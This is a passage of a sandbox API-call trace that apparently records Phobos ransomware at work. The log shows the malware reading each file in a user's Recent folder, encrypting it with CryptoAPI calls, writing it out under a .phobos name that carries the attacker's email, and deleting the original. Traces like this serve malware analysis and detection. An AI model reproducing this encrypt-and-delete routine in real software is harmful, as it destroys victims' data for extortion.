halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\6opkb6.lnk")) returned 1 [0199.945] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2c9fc50 | out: pbBuffer=0x2c9fc50) returned 1 [0199.945] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\6qo4ZLZi.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\6qo4zlzi.lnk"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x174 [0199.946] GetFileSizeEx (in: hFile=0x174, lpFileSize=0x2c9fbf0 | out: lpFileSize=0x2c9fbf0*=1000) returned 1 [0199.946] CloseHandle (hObject=0x174) returned 1 [0199.946] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\6qo4ZLZi.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\6qo4zlzi.lnk")) returned 0x20 [0199.946] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\6qo4ZLZi.lnk.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\6qo4zlzi.lnk.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0199.946] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\6qo4ZLZi.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\6qo4zlzi.lnk"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x174 [0199.946] SetFilePointerEx (in: hFile=0x174, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb90 | out: lpNewFilePointer=0x0) returned 1 [0199.946] SetFilePointerEx (in: hFile=0x174, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb90 | out: lpNewFilePointer=0x0) returned 1 [0199.946] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\6qo4ZLZi.lnk.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\6qo4zlzi.lnk.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x124 [0199.947] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2c9fb48, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c9fba4 | out: phKey=0x2c9fba4*=0xa32a28) returned 1 [0199.947] CryptSetKeyParam (hKey=0xa32a28, dwParam=0x1, pbData=0x2c9fc50, dwFlags=0x0) returned 1 [0199.947] ReadFile (in: hFile=0x174, lpBuffer=0x2f50020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2c9fbcc, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesRead=0x2c9fbcc*=0x3e8, lpOverlapped=0x0) returned 1 [0199.948] CryptEncrypt (in: hKey=0xa32a28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x3f0, dwBufLen=0x3f0 | out: pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x3f0) returned 1 [0199.948] WriteFile (in: hFile=0x124, lpBuffer=0x2f50020*, nNumberOfBytesToWrite=0x3f0, lpNumberOfBytesWritten=0x2c9fbb0, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesWritten=0x2c9fbb0*=0x3f0, lpOverlapped=0x0) returned 1 [0199.949] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2c9fb3c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c9fba8 | out: phKey=0x2c9fba8*=0xa32ce8) returned 1 [0199.949] CryptSetKeyParam (hKey=0xa32ce8, dwParam=0x1, pbData=0x2c9fc50, dwFlags=0x0) returned 1 [0199.949] CryptEncrypt (in: hKey=0xa32ce8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x40, dwBufLen=0x40 | out: pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x40) returned 1 [0199.949] CryptDestroyKey (hKey=0xa32ce8) returned 1 [0199.949] WriteFile (in: hFile=0x124, lpBuffer=0x2f50020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2c9fbb0, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesWritten=0x2c9fbb0*=0xf2, lpOverlapped=0x0) returned 1 [0199.949] CryptDestroyKey (hKey=0xa32a28) returned 1 [0199.949] CloseHandle (hObject=0x174) returned 1 [0199.949] CloseHandle (hObject=0x124) returned 1 [0199.949] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\6qo4ZLZi.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\6qo4zlzi.lnk")) returned 1 [0199.950] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2c9fc50 | out: pbBuffer=0x2c9fc50) returned 1 [0199.950] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\7r71vg.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\7r71vg.lnk"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x124 [0199.952] GetFileSizeEx (in: hFile=0x124, lpFileSize=0x2c9fbf0 | out: lpFileSize=0x2c9fbf0*=3842) returned 1 [0199.952] CloseHandle (hObject=0x124) returned 1 [0199.952] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\7r71vg.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\7r71vg.lnk")) returned 0x20 [0199.952] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\7r71vg.lnk.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\7r71vg.lnk.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0199.952] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\7r71vg.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\7r71vg.lnk"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x124 [0199.952] SetFilePointerEx (in: hFile=0x124, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb90 | out: lpNewFilePointer=0x0) returned 1 [0199.952] SetFilePointerEx (in: hFile=0x124, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb90 | out: lpNewFilePointer=0x0) returned 1 [0199.952] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\7r71vg.lnk.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\7r71vg.lnk.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x174 [0199.970] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2c9fb48, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c9fba4 | out: phKey=0x2c9fba4*=0xa32a28) returned 1 [0199.970] CryptSetKeyParam (hKey=0xa32a28, dwParam=0x1, pbData=0x2c9fc50, dwFlags=0x0) returned 1 [0199.970] ReadFile (in: hFile=0x124, lpBuffer=0x2f50020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2c9fbcc, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesRead=0x2c9fbcc*=0xf02, lpOverlapped=0x0) returned 1 [0199.972] CryptEncrypt (in: hKey=0xa32a28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0xf10, dwBufLen=0xf10 | out: pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0xf10) returned 1 [0199.972] WriteFile (in: hFile=0x174, lpBuffer=0x2f50020*, nNumberOfBytesToWrite=0xf10, lpNumberOfBytesWritten=0x2c9fbb0, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesWritten=0x2c9fbb0*=0xf10, lpOverlapped=0x0) returned 1 [0199.973] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2c9fb3c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c9fba8 | out: phKey=0x2c9fba8*=0xa32ce8) returned 1 [0199.973] CryptSetKeyParam (hKey=0xa32ce8, dwParam=0x1, pbData=0x2c9fc50, dwFlags=0x0) returned 1 [0199.973] CryptEncrypt (in: hKey=0xa32ce8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x40, dwBufLen=0x40 | out: pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x40) returned 1 [0199.973] CryptDestroyKey (hKey=0xa32ce8) returned 1 [0199.973] WriteFile (in: hFile=0x174, lpBuffer=0x2f50020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2c9fbb0, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesWritten=0x2c9fbb0*=0xf2, lpOverlapped=0x0) returned 1 [0199.973] CryptDestroyKey (hKey=0xa32a28) returned 1 [0199.973] CloseHandle (hObject=0x124) returned 1 [0199.973] CloseHandle (hObject=0x174) returned 1 [0199.974] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\7r71vg.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\7r71vg.lnk")) returned 1 [0199.976] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2c9fc50 | out: pbBuffer=0x2c9fc50) returned 1 [0199.976] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\7zRGZMLtqc2sORLSkF.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\7zrgzmltqc2sorlskf.lnk"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x174 [0199.978] GetFileSizeEx (in: hFile=0x174, lpFileSize=0x2c9fbf0 | out: lpFileSize=0x2c9fbf0*=1050) returned 1 [0199.978] CloseHandle (hObject=0x174) returned 1 [0199.978] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\7zRGZMLtqc2sORLSkF.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\7zrgzmltqc2sorlskf.lnk")) returned 0x20 [0199.978] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\7zRGZMLtqc2sORLSkF.lnk.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\7zrgzmltqc2sorlskf.lnk.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0199.978] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\7zRGZMLtqc2sORLSkF.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\7zrgzmltqc2sorlskf.lnk"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x174 [0199.978] SetFilePointerEx (in: hFile=0x174, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb90 | out: lpNewFilePointer=0x0) returned 1 [0199.978] SetFilePointerEx (in: hFile=0x174, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb90 | out: lpNewFilePointer=0x0) returned 1 [0199.978] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\7zRGZMLtqc2sORLSkF.lnk.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\7zrgzmltqc2sorlskf.lnk.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x124 [0199.979] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2c9fb48, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c9fba4 | out: phKey=0x2c9fba4*=0xa32a28) returned 1 [0199.979] CryptSetKeyParam (hKey=0xa32a28, dwParam=0x1, pbData=0x2c9fc50, dwFlags=0x0) returned 1 [0199.979] ReadFile (in: hFile=0x174, lpBuffer=0x2f50020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2c9fbcc, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesRead=0x2c9fbcc*=0x41a, lpOverlapped=0x0) returned 1 [0199.981] CryptEncrypt (in: hKey=0xa32a28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x420, dwBufLen=0x420 | out: pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x420) returned 1 [0199.981] WriteFile (in: hFile=0x124, lpBuffer=0x2f50020*, nNumberOfBytesToWrite=0x420, lpNumberOfBytesWritten=0x2c9fbb0, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesWritten=0x2c9fbb0*=0x420, lpOverlapped=0x0) returned 1 [0199.982] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2c9fb3c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c9fba8 | out: phKey=0x2c9fba8*=0xa32ce8) returned 1 [0199.982] CryptSetKeyParam (hKey=0xa32ce8, dwParam=0x1, pbData=0x2c9fc50, dwFlags=0x0) returned 1 [0199.982] CryptEncrypt (in: hKey=0xa32ce8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x50, dwBufLen=0x50 | out: pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x50) returned 1 [0199.982] CryptDestroyKey (hKey=0xa32ce8) returned 1 [0199.982] WriteFile (in: hFile=0x124, lpBuffer=0x2f50020*, nNumberOfBytesToWrite=0x102, lpNumberOfBytesWritten=0x2c9fbb0, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesWritten=0x2c9fbb0*=0x102, lpOverlapped=0x0) returned 1 [0199.982] CryptDestroyKey (hKey=0xa32a28) returned 1 [0199.982] CloseHandle (hObject=0x174) returned 1 [0199.982] CloseHandle (hObject=0x124) returned 1 [0199.982] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\7zRGZMLtqc2sORLSkF.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\7zrgzmltqc2sorlskf.lnk")) returned 1 [0199.984] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2c9fc50 | out: pbBuffer=0x2c9fc50) returned 1 [0199.984] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\8h3ImrKNTgE0g.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\8h3imrkntge0g.lnk"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x124 [0199.987] GetFileSizeEx (in: hFile=0x124, lpFileSize=0x2c9fbf0 | out: lpFileSize=0x2c9fbf0*=3754) returned 1 [0199.988] CloseHandle (hObject=0x124) returned 1 [0199.988] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\8h3ImrKNTgE0g.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\8h3imrkntge0g.lnk")) returned 0x20 [0199.988] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\8h3ImrKNTgE0g.lnk.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\8h3imrkntge0g.lnk.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0199.988] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\8h3ImrKNTgE0g.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\8h3imrkntge0g.lnk"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x124 [0199.988] SetFilePointerEx (in: hFile=0x124, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb90 | out: lpNewFilePointer=0x0) returned 1 [0199.988] SetFilePointerEx (in: hFile=0x124, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb90 | out: lpNewFilePointer=0x0) returned 1 [0199.988] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\8h3ImrKNTgE0g.lnk.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\8h3imrkntge0g.lnk.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x174 [0199.989] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2c9fb48, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c9fba4 | out: phKey=0x2c9fba4*=0xa32a28) returned 1 [0199.989] CryptSetKeyParam (hKey=0xa32a28, dwParam=0x1, pbData=0x2c9fc50, dwFlags=0x0) returned 1 [0199.989] ReadFile (in: hFile=0x124, lpBuffer=0x2f50020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2c9fbcc, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesRead=0x2c9fbcc*=0xeaa, lpOverlapped=0x0) returned 1 [0199.991] CryptEncrypt (in: hKey=0xa32a28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0xeb0, dwBufLen=0xeb0 | out: pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0xeb0) returned 1 [0199.991] WriteFile (in: hFile=0x174, lpBuffer=0x2f50020*, nNumberOfBytesToWrite=0xeb0, lpNumberOfBytesWritten=0x2c9fbb0, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesWritten=0x2c9fbb0*=0xeb0, lpOverlapped=0x0) returned 1 [0199.992] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2c9fb3c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c9fba8 | out: phKey=0x2c9fba8*=0xa32ce8) returned 1 [0199.992] CryptSetKeyParam (hKey=0xa32ce8, dwParam=0x1, pbData=0x2c9fc50, dwFlags=0x0) returned 1 [0199.992] CryptEncrypt (in: hKey=0xa32ce8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x50, dwBufLen=0x50 | out: pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x50) returned 1 [0199.992] CryptDestroyKey (hKey=0xa32ce8) returned 1 [0199.992] WriteFile (in: hFile=0x174, lpBuffer=0x2f50020*, nNumberOfBytesToWrite=0x102, lpNumberOfBytesWritten=0x2c9fbb0, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesWritten=0x2c9fbb0*=0x102, lpOverlapped=0x0) returned 1 [0199.992] CryptDestroyKey (hKey=0xa32a28) returned 1 [0199.992] CloseHandle (hObject=0x124) returned 1 [0199.992] CloseHandle (hObject=0x174) returned 1 [0199.993] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\8h3ImrKNTgE0g.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\8h3imrkntge0g.lnk")) returned 1 [0199.994] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2c9fc50 | out: pbBuffer=0x2c9fc50) returned 1 [0199.994] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\903fT4zIThIEKTyMuT7D.ots.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\903ft4zithiektymut7d.ots.lnk"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x174 [0199.995] GetFileSizeEx (in: hFile=0x174, lpFileSize=0x2c9fbf0 | out: lpFileSize=0x2c9fbf0*=5373) returned 1 [0199.995] CloseHandle (hObject=0x174) returned 1 [0199.995] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\903fT4zIThIEKTyMuT7D.ots.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\903ft4zithiektymut7d.ots.lnk")) returned 0x20 [0199.995] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\903fT4zIThIEKTyMuT7D.ots.lnk.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\903ft4zithiektymut7d.ots.lnk.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0199.995] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\903fT4zIThIEKTyMuT7D.ots.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\903ft4zithiektymut7d.ots.lnk"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x174 [0199.996] SetFilePointerEx (in: hFile=0x174, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb90 | out: lpNewFilePointer=0x0) returned 1 [0199.996] SetFilePointerEx (in: hFile=0x174, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb90 | out: lpNewFilePointer=0x0) returned 1 [0199.996] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\903fT4zIThIEKTyMuT7D.ots.lnk.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\903ft4zithiektymut7d.ots.lnk.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x124 [0199.996] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2c9fb48, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c9fba4 | out: phKey=0x2c9fba4*=0xa32a28) returned 1 [0199.996] CryptSetKeyParam (hKey=0xa32a28, dwParam=0x1, pbData=0x2c9fc50, dwFlags=0x0) returned 1 [0199.997] ReadFile (in: hFile=0x174, lpBuffer=0x2f50020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2c9fbcc, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesRead=0x2c9fbcc*=0x14fd, lpOverlapped=0x0) returned 1 [0200.048] CryptEncrypt (in: hKey=0xa32a28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x1500, dwBufLen=0x1500 | out: pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x1500) returned 1 [0200.048] WriteFile (in: hFile=0x124, lpBuffer=0x2f50020*, nNumberOfBytesToWrite=0x1500, lpNumberOfBytesWritten=0x2c9fbb0, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesWritten=0x2c9fbb0*=0x1500, lpOverlapped=0x0) returned 1 [0200.050] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2c9fb3c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c9fba8 | out: phKey=0x2c9fba8*=0xa32be8) returned 1 [0200.050] CryptSetKeyParam (hKey=0xa32be8, dwParam=0x1, pbData=0x2c9fc50, dwFlags=0x0) returned 1 [0200.050] CryptEncrypt (in: hKey=0xa32be8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x60, dwBufLen=0x60 | out: pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x60) returned 1 [0200.050] CryptDestroyKey (hKey=0xa32be8) returned 1 [0200.050] WriteFile (in: hFile=0x124, lpBuffer=0x2f50020*, nNumberOfBytesToWrite=0x112, lpNumberOfBytesWritten=0x2c9fbb0, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesWritten=0x2c9fbb0*=0x112, lpOverlapped=0x0) returned 1 [0200.050] CryptDestroyKey (hKey=0xa32a28) returned 1 